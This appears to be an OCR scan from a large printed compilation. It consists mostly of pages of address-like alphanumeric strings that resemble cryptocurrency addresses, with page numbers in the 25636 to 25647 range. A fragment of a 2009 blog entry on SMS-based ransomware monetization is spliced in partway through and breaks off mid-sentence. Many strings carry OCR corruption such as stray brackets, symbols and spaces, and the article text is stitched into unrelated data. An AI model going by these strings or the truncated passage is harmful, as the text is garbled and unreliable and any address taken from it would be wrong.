LJNjJLP5k8xt9QhHBYKwyvvCtkqPjzrQfq9W 
lnJSyP416yVM3TBc6EIC2FeyClodCVCge 
1nmM6bLGGrNvssh65pv3ivVzZRNWnsbp5 
LnN49kvDJONx7j2h2AEPo1SnLFnquQdUk 
InN9Yv4ZrwVaqjJSd7eZryNedwrbMRwVRXZ 
1JNoi2rBZRbqRDPxypcp9UCqxL93uDhTXB 
1nokf8vkobmyQBWA1KC48u3LskdZfw5das 
LNp7X44hskgZV3BgngKkufy5s4BGtQNpKp 
1lnpaYjmacPfCyfgmLGn6uj4wiU7U3uUFYA 
1npwbZemZnHWmkekmWrsAkSoxWnR5GRSG 
LNqkt6vuJkiTHMprkfXyjoPQ7xGJ4PSEX 
LJNqqcmTCNKGByvNv5RNZkKDHSHDtuYABs 
LINSCQofNgJt}6SphwQ6XA4Yw8zsoPwNPY 
LJNVDtAVrTNTCWNZP5xrDVLQBCYKEEnMv5 
LnVSCWBGM5p5K8XrvxXjM43QYVpyq87CsD 
25636 


1JNvUrzLt3jbjQ6FGpCBX7xsY9cEALYk4) 
1JNvZNR9zjFLFXCKnPHrbktywRp3E1SUHB 
1LJnWjYZpwESJLERaY8QoxoP7mvAV18QtRo 
1JnwLBtH50EubfsZuYWK3boxj8K7v4qxdz 
1nxjigCJ6QG6tcZWUP7Y9X8QXtByPuhX] 
1JNYJsgKDpWuarvoYbjAgen3iswaV6vwLL 
1JNyQpmUHoaYvxXPaNUUAhVrx67CRZ9rQqv 
LjolPxUpQw5ijgrvMTJ7wz1VETRzq76CQo 
ljo4Ea5WfZ64CKzdFmXtJwvQmTPSvhjasu 
LocCCt7g2hvmV72troDzjJryvbQSdDqm3m 
LjofmmDL1tsoV6HkHyPsgdo6B3PPZSHZ6i 
LjojYjmghrfVa912id7UpxrBTsjhCzR3jH 
ljomXd8UUHU0gYVDQiyKimR3cXZA82FaYp 
LJoNDdvas2r6mxJBZNmgVDHRpAzRGaF5KF 
LjonfKb43vEEDRT TgyVnLpJqlZBA61qkk6 
Ljoup3nmqxaFjNhfXR3aD5BSkKgg 7UWMCX 
LoUViezUQrA34mb8eZkFoC7 7qjPAF7H46 
LlJowuBwNg3GnhNTDny4zcE2rZtm2khL2o} 
LjowV4uytNGEaH7xwYKGKTGrkjttSH26Cy 
LJoY6EDRXZztFDL88WPQRNT3tESpd5v3kx 
LJoYZMbUiIGMoc6SFoWZYfsdYoHrmED4g38 
LjozZMdjm3vWcP13cdw3Qmw/7R91Rv73qbU 
1JPINdwNqge6XkYion9H Tweqil6HzFkePbK 
1Jp3RAyHcXRhtxftpJaont8iSauoL68Hk6 
1JP40oZFdTNxAX76vwe8aa4CbaBWCMwyW9Q 
1jp538z2z8S7MRymPpkDp6XqnXNMV7Tt3V 
1JP9FyBy3ZQyfHEYmDhd7Kk9cbyyBEFRpF 
1JpcbXxBUMgoL2JL8PGDw2E4W1LxyTMr3D 
1JPCUSNKNTQfTHohfJRDnfqcpWcCzurfex 
1JpeCr6ambYnG4tV6CtFHQsKicDyJK2wuP 
1JpeM1GDMDZAAUPq7p7yhBxXgAAlwvtADaC 
1J)Pes5b12Dxt7FvsyZtuViis5RgktWzmUsj 
1JpFErCBgYcEHYBXTel3eryqPUbrPfuiwu 
1jpFqRWAzYskrD7SqCuZSjqmKaBB4iT25 
1JjpFRwXxt94roWaC8W86Eal1nRatorbZ1YBv 


25637 


LpgiKEJPtnl1ZAncUGVNi6jeZBdoRcVQ1z 
1Jpguiy2aDFHyKzmwwdzPgE1xDHK1AvVbo 
1JpHincMSJ3H27VWbkvPrRnuNSPkiB4qup 
1JPHR3HUbAlLet5quDAmi5BJ22k1EVokvzj 
1)pJZaVD5HZGLRAV9DqFQGCqbfDF3CuUbP 
1JPM5KGY614PoiPtiG5XcL8iXNFFBDGFFK 
1JPQQLtrjXrqRqEofEDoC2ZzfP9KvyG1FH 
1JPRgBfYQVUTYBqh8Qb7MNsNyTvh2FT5Yj 
1JPrn9DfwsSd9sw4ZMbH2bzHeaDBL48e33 
1JpRSkdMvusZxwsmZxbgqhY5YMuqkK6ujnu) 
1JPSGbzixxoVRsBhpgqjJJJzzr32UHEGj5tW 
1JpsLBqu4BgJ65Lg5cWN8Qontoorpg81Mp 
1JPtx1xxvRS74HhwRdna4yUvjBtzQEsuQ8 
1lJpTxaPZQEMEvvfb1lwPnCjGfZoC3mN77Hs 
1JPUNOMpJKu9Bk92L1MoCdTDgpmpHaUwZh 
1JPwv1lvbxWH076K367mSioZLV77FSfTC5i 
1JPXJTKE7Np7aXLvVUEQMKdpggzfG5vgds 
1JpxQjosngqPXZF7bEpMKrCDrzVxTnV3Dm 
1JPyqMXFAwvegpAwR7JzqwM3wVCCUMUuix 
1JPZ83rxZcQqxDc4xFmukqte3tKhYV9GEv 
1jpzAeEjJX74HWFB1l1jakKZbfveLhAoReu5 
lq6ge74akKYYnnvv76CxXY5SHfWJPfs8L8 
LJqAEXCAjiMtuhn1Lk1sNE9iJFVjCPjtzZ 
1JQAhsLBPyYxsh7TGeuLrMeS405XR7FeFv 
1JQbJRAL9asR1w486QNR7XCtPNVxGZFMwp 
LqbmWZsHpcan8Pid8wskex572Uqqa5UhL 
LqcXUjLxze9WyoumtFMka6vT9RGJ5UoHm 
1qdoNaBG1JM1Lswbvdh6Zbs6VdC2JGaMT 
1qETcPmPvra6JqvoYqHCytD8MKiIWG9b2Z 
1JQG27t2aoAi6HgiZTJkWdzP7T4BpDBxU5 
1QGwé6MKqRLmjcavABqDa3nAGA8nixDyWw 
1JjqKaLuYhzBPZcUhgkivzqE2vRWbo72pVL 
LJQKH8r3DbF89fBwe79LPH4LF9GppajKnQ 
1JqKKdkFNKsPJDjc6PgXubEfvTwBHReb1M 
Lqm2D1Vxw3LfV7yv2t7pCaZ4stZShGN24 
25638 


1JQPxPoC6NwEz1XvxMvryG6J53tbTQleqQ 
1JQQ4bCMBzTDvu83sLGqXxXXXM9N6Qa9JXx 
1JQSb3V7XKucWyX6zZ0ANz1rLAaRx63rkeB 
LqSRWU1VYDD9SWXmmcnkcFUUC|ZS1IBbWA 
1JQT6aCTZvwj60HApQj6C6ZkKwcjRATeBV 
1quzrJ4sdiwDrfurWPqw8YyMdckWvVLMc 
Lqw8jMqryGDwYh8LC51HumF X4wsfrnxzQ 
lQwwjyBEeFq5fGLz9MQ7NzQenTsCMqZaq 
1JQZ2Pob6407SEEUT4DJgc5S1vbFx43wCB 
1JQZUQdGBxyKkSi4KNmwjC8331s6acGB8e 
1r38hZdz4BzGu3gK4HYsSXZEQVi8SInNTNU 
1JR3PBrinAAkKESnGMFJL9UWX5tfHcP6édhy 
Ur5qdBjy9Qpf5pX1MDzaqxB7hZAvEvhBU 
1Jr6Lo9CoGtaPTzA2FyBxXAwfCh4CRGaCDA 
1JROfAAkKEHftcZRNVdMP8cF8ewre7T7mkm 
1JraWU9npsKVaRNovHbUW9pGrUAdBa4Yys 
1JrD8j9HSfsJ8BMN4nHiioBd9JEpnfWVMSC 
1rdJp72qWwXQjpwvLaMm9GGdmovutnSexL 
1rgr4EdsFuMLuuuPMxjgc1T8xGmrrPD6B 
1JRQGSHF3QCMQ1bc9g8FMgYhrZPEJU7qGou 
IRkK4hNQgRqMcVKzZZiFFZEi6y2JBFX8dsSs 
Urkh2traSzpNfsqvhVdG9RPMLEKHQcgbE 
1rkHXA4560K2hM6z6d7PZXS6VnNV7hGbmy 
1JRLuiz7Cuifr6Yd7dWYBh7MuP4WSYoZUY 
IJRMHAAdtfKVbkT6zrQovtjcLZt/KYaPVK 
1JRN7LSrQuCj3Dr3LyKQxhQKSnq4PoUBko 
1JROUYSAFF5pCxr5eJrlwav44gDfiXEhtT 
1Lrqk3nqEZxB40JMMEuCczqxNXF4AFZSpB 
1rR6KEF8h9gpm29EpF81YW71D9mk85fMr 
1JrS33LZXiGPbdL7N6ocjPnJKsyY3H3rtp 
1IrSAJNtNrRRgDFY5xWoVbd8nWt4fkk1lby 
1rscM9gsPT97UZTNJUAWEffdL8B3rpbjm 
LRt8QQAIGFCxRonUWjizGc4cAZmE1kM6d 
1JRtD9x8QvgD9Ktf9uUk4XgNUyrFzJYRmdyY 
1rTZHDWGP1ZyKBrb3etZXhER7ZT 7vEoVY 
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lrugo5KXzAgLB2tGfm8FECBHV9w34QTSp 
LIRZwX3cmQxtDvCvmoova2j2ZXaX4V8Ekq 
1JS4gCPDtEqVSUR27qCSSfTjROQGQc8tFB 
1Js4oHPJu2KQtwpLWUBba71LQfL5gddbCVv 
1JS5XZPUU6KYMEZXF2dCYx4SKYdhZuEbxs 
1s77if7NxxyE2w4UahAZv1fsa3emq2Pb7 
lJs9FRmM8vzbLtUtXqgkHwSCAw989K4ktXG 
1js9V1Q4KgugyDDVWo]XKdsGotEALleG1 
1sAhdEMoCXSGDBC3f2NjDKLfvT4eAnsmj 
1JSbmrRnwFeUXe6U70A0ONgNH9FVcpxSggY 
1Sc7Hijaqj48KbQ9UBQHxEcbuas8ijalU 
lsCem4bWjNungLX3Jo73cG4PFTSt2upcu 
1scZWLHzakt6r1l6Aj4skKhesf1lY84owCQq 
1lJsdfeBcwqgeasG1PLcm53XSZz1BVr7jUG 
1JSGKrhwVe6oh4aAuCpkSVutYNkY1gJzQv 
LsKhJJZVroEkKE8tTu3rnXycHhyzkPPctA 
lsKVxFpDJgd53EFTQZcDKHfcS493mJxSY 
1sMYv9rEelFCDfejvjyviRqnGf9pStZ6e 
LSovLQb5hAfF799kKE5WsQnYXC1CVwCQmNR 
LSTA51Y1gtrjpuE7JhnJflEAoghbce7o 
1JSu8MB4V3i7MfUJttQQAUgV2rAh67hPKS 
LsvN1LUjoUmb7ZXVW5j7QmAePuTvykP8jr 
LUsxmmyQ6EKzgfpG6rS2qCz6rPhVMkbjtq 
1JSZLDChU2v6JdusejxbeH57kpkMdQmRi9 
1JT3pMqPWpcvKLLszx4HFfFXLMZgJFBS55 
1Jt6bgHBNHQA6N2FKDcsFqxBF9YY7v3jL9 
LJT6Q3XNJzLbJsqGUiny8PjBfBpryUoWH}] 
1JT86FAU3Rs7NyRP9HXPj|WxMYv3vLLr]Yn 
Lta5JwTGtDBjw86tnEJmjJRYj9LAMX2jjP 
1JTacp1XpMuNVmY6bB2A3WE7gaFACzskeo 
1tb2rS9ucb1rpSLtMKa69wmAXuPP2AuFb 
1tCo5A8ynRRmp6aj3SpGjf64mndadswfx 
1JTfjznhea6G3KtNNsTkfqkAowhSL8Csij 
LtKFqxr4ckUH5LeTEQJiR3FLvme2eYsCuU 
LtMn9AYXEuvYnnxqwf7sMweZAQLzuZCXo 
25640 


1JTngw5sbURisqNj8nmtp8ts8htLcxXfVcb 
LtrMjEnB7n3jYxSgimz16ii8nL3qRy7Pv 
1ts3PBZhCekvTDGLuKDcYgiUxykhM2Qt9 
VTV5a9qZX9Mrl5emum2W3wPQe4CuAUZ5x 
1TXKxZWeh6CjAUNFnKJEXdrPjKbAj3N28 
1TxVT1Crjlgpk6PMZNU7LFWKzDDmT8NRW 
1ltyd7Amo8Aa93LKoSjZogz7h7M3XVMABL 
1JtZCJhqopnpcgKKLPHa7iahTtatBaUBRgX 
1JtzpLZKAFogJ2xEcxZwLL6fY1LRCYws29W 
WU3WguQfMSSQn6em)j3H3WxUdXjNzLp7f 
LJU5tAYHqw7 1u6MbqvgwPyJRYfVXQCPeFn 
LJU6SJN3Han5o0j38vZ2Epjjja3dnZetLR8 
1JUbfBkquwxLkV4P8LUdRCLScbQStAbPkM 
1ljuCkJpYeBpTZvA6QxvfQWzDpxxjZfnnhq 
LJUCMb5MnH3TzgLM3f7Kmvrqc8KVRiweXM 
lJUdgeWxR8yjYt5n5bzGZfANMkQqZfKRtK 
1ljuK34rG7fk6U9RaYKyqoj 7RXgZrj2ifA) 
1JULzfob74vMLsDFNfUrc28LLQ1wJ3FUIF 
1JUmzaNnhGRSqqxb8Dk6T8PqU8]dxboaqb 
1JUnhCHbiCaEU4Ba24adbULxrmQfgc8gpQ 
LjunLCujw8y9cQSSMPRXf73bjQoQLwcNbH 
luNmaHuTABovMv4P66cXyc2TS68SGpwFC 
1JUQmEj4jCmCKLu6yszj W8eqkap6weFp2Q 
LurcRZm1lwCxqnHtK3mVtpkhHvmjJfhm5zD 
1luTrZruWsSHMULt1lbCmimpKuu7deucwKCW 
1JUU8iAUUHWGFjrxxqBWt95X7Pi89FgJ2a 
ljuxX7yuvjJC97jTKRKA8espECvfykYLyFbp 
1ljuXEzaG9Wui7XkgN5BpoL4uih5ETpHMjo 
1v2h3YxtdMC7Y1D24qn8psyMpebzxXMeCZ 
1v2Pj5vfLxYPRdVzjJJeipwMnoa2tV9ON84 
1JV2q4LSbn6GMjRP7uUG2ByYqwdBMctZU3c 
LV2wtmAJ5qF3eLZCGimPfjh7dociBZLVT 
1v3Dhv4TDX7kbNYorThM1INCNTbp5tQmKC 
1v4HPvAy8tcPAaWKQA4QTEgWQSxnKvFESE 
1JV55bGWYPTfKxgEgr2arxXC7RMTtlosmmp 


25641 


1Jv6CpbHNvGXP7Li2arfvRKeqaCTvBDq2B 
LV7P1GLy5ZyWGDmCTVwaqxaPKNwjVNbsnf 
LVA5NJQhifinCVtnNZzdM7PW81jjpVV6m 
1)VaAuKx5poaW7hhd59G2es4drjy3MVC71 
1JVB6dUMjPQUi1c6kUUYmJLY1grrmLqiMf 
1Vc2KgpnTijuFeLjiGaEyrDUHQwXBGss1 
1JVCB13WildFXeJCTDGnACSyxjZYSwgGVb 
1vEZSDfGkLVwsoGrWjBUG2pMh9UZzJCxqn 
1ljvfax5DB4QrC3fY¥YZmZUD7cMebKZSxZGra 
1vHZ32a6hJynpwbszKCoKGSRT5JALZ1K7 
1VK5kVhudbCgiJgKUYMXytNWuzEMGgRLv 
1LJvLMPgS196iQfExnCfpj2YJU8isPDXkGY 
LVM5sn5isrhDbF8grGDXj9XZpYQpMf89T 
1JvMEyhWRboLRaPojQPSsCo1p3Baq56JQr 
LJVN4vSTcGfFxdZhU8aF1pSDAPYLSmYVuM 
LJVNFXYiuA7T8FMX7ePXfwpScMtLxktQFP 
LvnujaXWQFThzjafNHelLUASTYp7KsatRf 
1JjvoJmAtcmKdoS9yjhjJ4PgD8pLRpMhwokkK 
LVpmViIWHtK)JvEz1682EafHw6Zxu5eo0Au3 
1JvQBShLBbUdvzdHY2o0v2RJ6vsybgRELrx 
LvQm8ztkt9ZgSSERE78hkybHBY7 7sf9Fv 
LvQWbxTCuoEbWWrHYzCGBadtdjsL47TzxB 
1lJ)vscoKsNbczrVybAytdHKiDBEqGkDURyS 
LVTZofSAggkv2uNgZhv2UXaiafWjCdsFg 
1JVV96amLGHqDdRk7rxiDhpkDydQmWnbBK 
1JVXuew2Tcro8GoSaLniL8JvHPNWtUmedK 
LVxUF2qFvcWAghkUZmnTzE1S7V8b8LXRA 
LvYANTTvuzrgqraFFwQfr9B44s3LZwchMF 
LVZMjVydjFQyokixD73rcYDQfugq7EHt89 
LW2nakiagPQ880Q8JkKZMUWT 3tCHcFpphi 
1w4AZ2d9Spi8FTPKHQjMxz2VLeiach1Gx 
lw63Acmp5kenQQaNw7k4YFUVeoDfxtvFj 
1J)Wawu75tNAjK3NAMmwaSafS9MZECZdfUL 
LJwBfT8hVqyvLFmSU8yJkaC12R5m4SAviz 
lwcbWKBhZfQpL3GgzYqDkzxHYNXhAG5RH 
25642 
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5.9.3. SMS Ransomware Displays Persistent Inline Ads (2009-09-03 15:14) 
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SMS-based micro-payments are clearly becoming the monetization channel of choice for 
the majority of cybercriminals engaging in ransomware campaigns. The logic behind this 
emerging trend is fairly simple, and as everything else in the cybecrime underground these 
days, it has to do with efficiency. 


Compared to micro-payments, the 2008’s [1]monetization channel used by GPcode in 
terms of E-gold and Liberty Reserve accounts communicated over email - with cases where 
the gang wasn’t even bothering to respond to infected victims looking for ways to pay the 
ransom - looks like a time-consuming and largely inefficient way to "interact" with the victims. 


Another recently released [2]SMS-based ransomware showing persistent ads within the 
[3]browser sessions of infected victims, and demanding a premium-rate SMS for removal, is 
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1J)WdjKsLuC4P7BGxXtigutf28qCFXxB1Fc3 
1JwEs5scEsTvbtirSNg6BJdPVyw6t4b1inR 
1JWExLUQsag5qL3F42g1kDAAvob6bhSgLU 
1JWFrZJ Bn3gbFZqqcro6guUVbENo7KS3BMD 
LJWgiyHLc5J23s9sETIWhdjHUiexVPyC2R 
LwhEUMj9wW22kCDynzEPiWJUA4xDDzVbR 
LJWhYnQuxXf8wpDhBZ8YCYePwwGrgwZpfmV 
1JWiwbr7zSo45pqt74nvA6MhcSE5XsByrv 
IWKILCWSiVuMLScW8FAY93jej9DE76AaxD 
1JWKUF8zzA6cUCnaomf3Ghz9QUK9VEPNZ5 
1JwLHKUNQgYT8svEWrMSAUKpKduZEqkPyd 
1jwm1zZME7Vy7FGP3JPJTm6zXT6HJfaLwBY 
lwm3srpUWtLTjiSW4Eo013LTWnEdC7KGbt 
LwNQSnkr3C6nxqubwbLgoy6An57pzDFsy 
LJwo3SKjx3WqxUK5ZdQ7)XxSz7vwEzgAyv 
1J)WpdwkjexDjiwm6scSucua4k5eerCuNvi 
1wPuL5h5WrvicpZh5dnZyP68adtYgNpvE 
IWTTVn7jpYNb7yyhLFnaReqroiHo7EE9r 
1JwTUDkKGwWVirdVr1QxoGr]Wy]gn9EkL6uv 
1JWU7NpCp6is2mMQDMF3mrtvngtspU8b1DN 
lwwDcaWaqtkKkQeG97ZwQEEYSDAFqieQEnS 
1JWxuoZPSn538fC839SL38DFrPjTJjyMNu 
lwzMngVYclmwxnc8mTIcZUTKdmingDL2Hp 
1JX2aQu3EbqngXmjEGwjJZqEVPGWtznVv2T 
1)X4C70hUosSNZDDAS8ZDCWNo13kh)JjizH3 
1JX5QL8FGsTg3iX8aCGRRdDh5PUJcFdaVE 
1J)x6BRQk2ANxbwo2zDuieaoL3smGYCNjsz 
1JX7WRIBWG4Je4e06C7xScQG6PX3mcYGf5 
1)XaaQckMvyBwtifLeXFkZNV4ueRf5uaUW 
1)Xc31ruUkQzPCF8eNC6p9eeHYCuge8cyxH 
1)XcSMohcb8dx2h8ZggdFmugn4JnDusagAi 
1)XCuwgofdYPKYuoe6WBtd8189BjwLEFh8 
1JxE9wMiMPVxzfBg3c8PCqBQgMdkr]V6Dy 
1JxEBZXwWoJV2JKSZ5Rh99CECZEZW4zu96 
1)xeXbvwGyg3CaHDsrWBmj9jQ4SmM1R9to 


25643 


1JXGCoqkVmJpULMxfAAdGczBPWQZFNcfn6 
1IxhjvXL8hDd8q3TtjnCgAi5BmdrdG6H8Z 
1)XiKhfyeFg1lJeQX7P8nrLYTMFBXsUd6WQ 
1JXiLJ1BZFL59d4yo9B3ZKtpnq3sHqqRzj 
1)xj4DPQbJSJ5ZzqXeZkDNUaL8fNhBqaRE 
1JxL6qwf5NGYwVvDViafftoZWPnsdwJ7oy 
1JXMgHk45RRr4JArnsRHDWPTBKUGFd2otp 
1JXQiBYGsC7LT3CRZDPaJxzp1SvoWToSn4 
1JXr8YtykKuoYPoh6qqCoC8zYUKqKfsUmR 
1JxroS5hnCSmjJ9WiPXwTjldFpb5RVL9abEN 
1)xtlyvYfJJQ2cSYzgYmvWnC4gBWWUCJ7A 
1IxT6A2rrynYZsJi3Z3HfrhKFAIQXbLCBqo 
IXwumt5vgAN63hfTmr2MTjfeywnYnzzZ 
IxxwMZqYU8VbLu4RwWghn5q1z9FFyalzq 
1JxYp5xtCRvG9Jqt7F57H7h2sTD6ZaljXs 
1JY14K5XPYaWEUXS5iIYFTZR2KTbVYREDKRM 
1)YIBXQNEje3M4d4F9EqYNqByfEHA7Lko 
1JyB18hzjEJjx6hkF4Uj1CfmmMHdVWyFLV 
1jyobCTR6UkofiwX8rmw6Hwu7eaWdUHV8HP 
ljycaWKMeSK48hSzhh49NeojJPQNi86y2K 
Lyd5x7v1lmRujVYKtmfSVaF8ZaW5utRNhz 
LYdWCc3LjKKYtpM4hvh6oFaDtFBKa3RHf 
LJYf/PXH23QQqgTR53R3WC7sgVZxcwMTvm 
lygoJeNmVfdDxMnrrcxEeHunAyupchyae 
LJYHFxnGHwikFrqwr8rLbn9Grv30S2pHWH 
LJyiojYQwF3bnMjsY6WuxMfToAfDkLpRZm 
LY) 7WRCtkUUWU8SRw1jgXPnAwdghMYKJc 
lyyKv4t2 pw 7AEKKGU6LxBSmJX7TW80dNQe 
LJY¥mfGCtzHKC5YRRh3eLc2QuVBHyoSwbv4 
LyNks2u66no5DYVQ3jjEwR71yqTabDzxf 
1JYoUPCNTPBKTFoefCwDRMThQZNGoDwwZb 
1lJyp9NwWEbEwezez5KeHV7XcwCxEpUN6beU 
ljyQp7yP3hDJoRsBJLyKb2enCvHT1EoS92 
1JyQqEaBZnotHRBLHQPMb7HWAQaVRB3yS 
1JYuLZDAjtLsskAeNbEE6Aa3iDZn3pbDZF 
25644 


1ljyuokRPkjYx85 1AqpXMTisesin8ghnYpx 
LJYVmWixSxf3g9agaz6H9df4yVrVTt8y19 
lyVvzSpZkFGVg7iRhnKpGNMFeMvhwU3vp 
LlJYW6z1sVaZQtAPr9js2aGxzTDd5PcjKKV 
ljyWHSmdF7hQLcEXtfJmyewWG78ddnWNvf2 
LjyxrkKELCNMECqLkE5 7jEFMX50tmGgcBSZ 
LJYYghuv2sthSiaZqlqsGXZ15toV6EdEw7 
1JYzdgU77BsRS7LNvgc24JTLUGZYXdc45r 
1Jz13ekvYLWVuaSZTxZaACbPmW)Ju4tB81v 
1Z3rmBG9tjCyyjuF4eB2MjDpd7tShQLK3 
1JZ6bGoZsPAxQcXHDTgts4dYNjaFBxabEK 
1JZ7Sc7BYLwwoSyf3gRSDvduRSC29teqru 
1JZbgwEHppu7FSTzoe3dfecP6s12fh13Lp 
1Zbj6kiosSqqifNHDhg6wXivim1nNKSHk 
1ZbVbuS4f7eVx8WgvEGDTUXY8g4Uqq3iQ 
1zbvZ8zvWecnf6k7rp5isW9IQQFpHpXZrT 


1JjzckaaqhggeCm7QWZRp60X01XU7DsM1NK 


1jzfF8qQuytcPtZ52xQxXfnfe26ZNsglvsk 
1ZGXjjcq2TgswT 7herBmP2xLYjD73sbuZ 
1JZhrQocLRdXHkzgULZv8tjJcJwNikCfwq 
LZHSZANNzgAfojArwxUuQrzQnFrWEe5aB 
LZkPYKWYz5erdJQtwA7ufk5azPmM1HG2G3 
1JzkKUPVcxBOTMR68n3yAhpuczzfv3sLXLj 
1JzKyzxf22ijctWKywj9ZM8e8gtHCtnv5Y 
IZLxZLAaBBtW9zrlzHgsUrrVuksGFHNHk 
1JZoK49jUN1gH52i5976VsdeYo2YN9dcgZ 
IZQSWME252PicvtRGBC44CNVCndg7yrUk 
YZS5TVhwnyjpAZp8av8gLbCJZHDcWLzY8 
1JZswdDCZFkaJ5GrnnCdn5vwZBzMyjpU88 
1ZSWLMX21KXgr2bLSHG9YgadVrs9M6z3Z 
LZTqCHzjqtg6P9BXWBLczvERIKVURMQet 
1JZWeDk4UN6Z800MfvNiKYv1MhtqdRzTtU 
1JZxfUCbUPVv5nrLr5mKuyxDYS6gckrZP 
1JZZ9ARBXBASdgmYii5pQWFkJUUseHKdh6 
1K161NcB1ABYfK4dHUQ3TELSJfzwbxr7Vd 


25645 


1K1Bqr7sa3jwNt73jmyd7GvGnjJDYs2i5Q 
1K1DBEZL61tPYJkZKZCCPSNMLefxqzQTgR 
LKLEINtQZuh6gWUtx3uUCN3Pb7dKjGASaiw 
1K1eXXQ)xkr8dPsCa9bormHQJMgAF78PLy 
LK1gyUVExn8qE4DkP1MzXN9JPinfTXj2Lt 
1K1psc5gCokpjJCnV8b9VBtTQaPXVByTFHk 
1K1SjkuzyMUfs24SxSCQ9hYdxN4pdRMqMv 
1K1LUHBSVLnNZD82A0wAB1601H18drbdjbrM 
1K1W1ySoZjBRKBYqLaSSRvYd7mWusJ]vrge 
1K1XsmXfQChwSjHE13gan4X7dPwekBg4jk 
1K22WeiZA5rHnxth85m1NUtCoYLjv5KsW1 
1K2bibyX6pgW16ShyTyEz2xhGFJ6re7K1s 
1K2cjmNpcMYkRpkZZ6sAgBg8xy6FTAxdYm 
1K2dBHGvSUxVEgQ4UYmZpbH3qDak5nF3YA 
1K2gg84ByLAb4tKWt7RyU90KD1rGqzDV3H 
1LK2gHinT4gLdQT9wDgTdF7ZLwcd3r1Eujh 
LK2KEyPhQ6JmvkQimHEskKff3KojMgUKbhv 
1K2KHUSLS4aH1lvv6pfcMjV9rcGpRhMdmjz 
LK2riYFJHWx43sAJqZPGbGBui3CkqYhnP 
1K2SbvQSWtRaiUdvvPKNnuXhwm9wuHnkKFx 
1K2trGze1PvMb2ar8iQreeAKi53Mm4X6yYt 
1LK2tYr9yrUC21krSnMcvvp4sQygL7nV61J 
LK2UVY2BHqvjJe8NGpkbg4WZvYLSDLMb64c 
1K2vFuAd8HePBYeiNrCo67Liagqfw6aQrpA 
1K2VhczGz8Wn5fb64mdNWX1YaRqjzRbowy 
1K32fFtdvqg5Qkd2rESZ9WXkHXWWwphoxPT 
1K35zriBDdhgBaCrcvcTFZrT3tnduLUpw3 
1K3bxX7vXJNYdja9qWSuXyMNyRXHYLGiM1 
1LK3ShU94hF150vnDQ5XDaqjcYDS4MK2Thz4 
1K3UWMCfQDhtRKqZFKoE4dkWnicNZcKgCc 
1LK3wiky4Sj5XFCUq9ZKvenxnV6BL9ZXxPR 
1K3XvtgpezNcPoVdjJaWHrVXshcp2s3HN2d 
1K3Z2FgLJiSAWAAEXQqHcCiMzePMd3V5LQ5 
1K42Vjwa9TDTFKZNcfrRGKDjZVFKe6aNfn 
1K45Wq14V69cRWTIAQV4KFQvqzv2ZeUdCRb 
25646 


1K4CuaXT5z1pid3pRDeg8Szfd8Zvr2d6D 
1K4dzDigLNnvgqCQEiKYSUhvwgkAku714B 
1k4EBLOHEM1LWoipfyLEKmCPygAQz5C42 
1K4FXeZtNUak8Px8dKV9Y3znui5eqvU1)4 
1K4jjiPMUUHOUSDHwo48sU9vKApv8gQfye 
1K4jSgPSjGhp5e5ZUjLuszU2j7n8g8ur7h 
LK4PhHXUMt4qEJRvhi925pMkQJ2JebLEJnv 
1LK4qn9vJFVMeiZ72cVbnn1QzzAJEPtrre2 
1K4UUqnng9R2vUufoDECegokgdGfBNjYRj 
1K4Y6sfnxifG96SG1vC1P1RQaTEKGJsPUX 
LK4YtkJENY)x28SmMMEtg3wLwkZRtFiledj 
1K4yxXtU6C4Mo0L5ZdZ97K6HREN3HXQ9nYaA 
1K56AU2HsiDNph58GDbbdQRb8uKPuP3HCn 
1K5CetYDSN3KzzaAq7w9ahmaABZhQxXe6Ta 
1LK5F8eTEchKYsytGRwWEQsbLovxTgHGiTok 
1K5FdeDzevk3VGythWrSPfWUvaQaTxySnw 
1K5GptUUsn7KobSMUKmTicesk1bPv9Shrz 
1K5jNeFdq5KWdyPuPBpodmgzGJaGmVExhm 
LK5NXiuqtUeZ4XSt5AJoaGjoNNhQjBJWAK 
1K50TDZUNKtbta4zBqrbTEcfzMdFbNxgTB 
1LK5pJWdXg2ZPxFpoifnVR48s7Vhfk6Pco4 
1K5s7UaLkzMCBRvPDBubY4zwyYonkxXfAPne 
1K5WmsUeokD7RfcgKgNS6JowsZywDG4rCH 
1K5XLqUyDZ2EGWYh5my1FU7iuixkDdrGUL 
1LK5yRV7fVkf6h2BPXVGb2cDHZFvPB2dfea 
1K62nmFuil9wcoYNu6bZRGgbVWiIDR106Lm 
1K648jJdcBB5L46xLoRyZCASPCS1fEBQBC 
1K69Gdc4CRWR2MYcYj8ha2jDpaG97Edy2H 
1K6ETI1B1VJZPDpq5pejMLUWXaQwWCz5vb 
LK6FFqbvQaVeR2kLrZQHKsd1kMbVhdUabr 
1K6jd8dcbz5G8ygPsYFYULSBACzqx6FQeN 
1K6jmcg27xdUHPd2azpMLborzxGEnYhg19 
1K6kBPK1aGVgwDekHGDtgnCE8iVtT1ZPPX 
1K6Pzfxs48SS49peiRsJrFv1lriDGFSTaoS 
1LK6QTTLYdoB3flcSdgomrRvLBFSx3WzvHt 


25647 


1K6quaFg8USW3RG9CMHn1sjYscwdfdNDNU 
1K6wDBPtoosCy8b2kXz5xZETZp31qwebje 
1K6x6w8GGfLWAWLMRwiqmsdBS28hQ388ZE 
1K73HpGv267x7gEFL6o0ivy48nU67fH5ZPE 
1K73rNg2NrvoMwvEpmz43JrjkcyUJY3ayQ 
1K7AGpH7FLtfLFDCZXFZgGrgkrbGXVzpEy 
1K7aLs8emMNFQUH7aWVNtkyjTfssAPevonH 
1K7B3wPnnmbZLdHTm2CSwyU2YRkwYncHoD 
1K7be8RMZ36METzSyfoWuEApDGJfvoNR22 
1K7CiuMCjJMawCBHP7WQnDgqLrSd527hKmaa 
1K7Ebex7RS1Rp6MpfFmKXhr5rhTCTUM3XY 
1LK7H85zvy1ULYxQNJgeukQFaH7tcKP6j8a 
1K7MaFmx8r8Hu5m9BWRRgXbcZUDYLaNhsB 
1K7S4KBKUTjUammy9thHYwJqaRGQjBTn34 
1K7SGqhu5qzWQsSxP8Z8K2VCUTR4AphaU8 
1LK7Xk7J5P5YdqxcsCpbjNmiWckXyzxHdQH 
1K7yFogohGT99AigrgRqwtniLqiZz1dLu 
1K7Zah34wuyb3p2pjjiZaKiNdS5FzkmG51s 
1K81grBvxLSRV6QeVRUDt]qsyFFK2M5CV) 
1K86Sj4TdxM8c74Qyup2Giy5aARQSQruU8 
1K87ck1G2QxPTyYoDRXkDGG9Ryr9 7cbaEF 
1K8e8PhuYWQ5TytGM4rwC36K2fDWoKw3uC 
1LK8foM6gHiP]xpEQWFXDU8rz4F4G1ULKRG 
1K8iGCY7aw4vo866Tszo] KV5Rggr3ZoDAx 
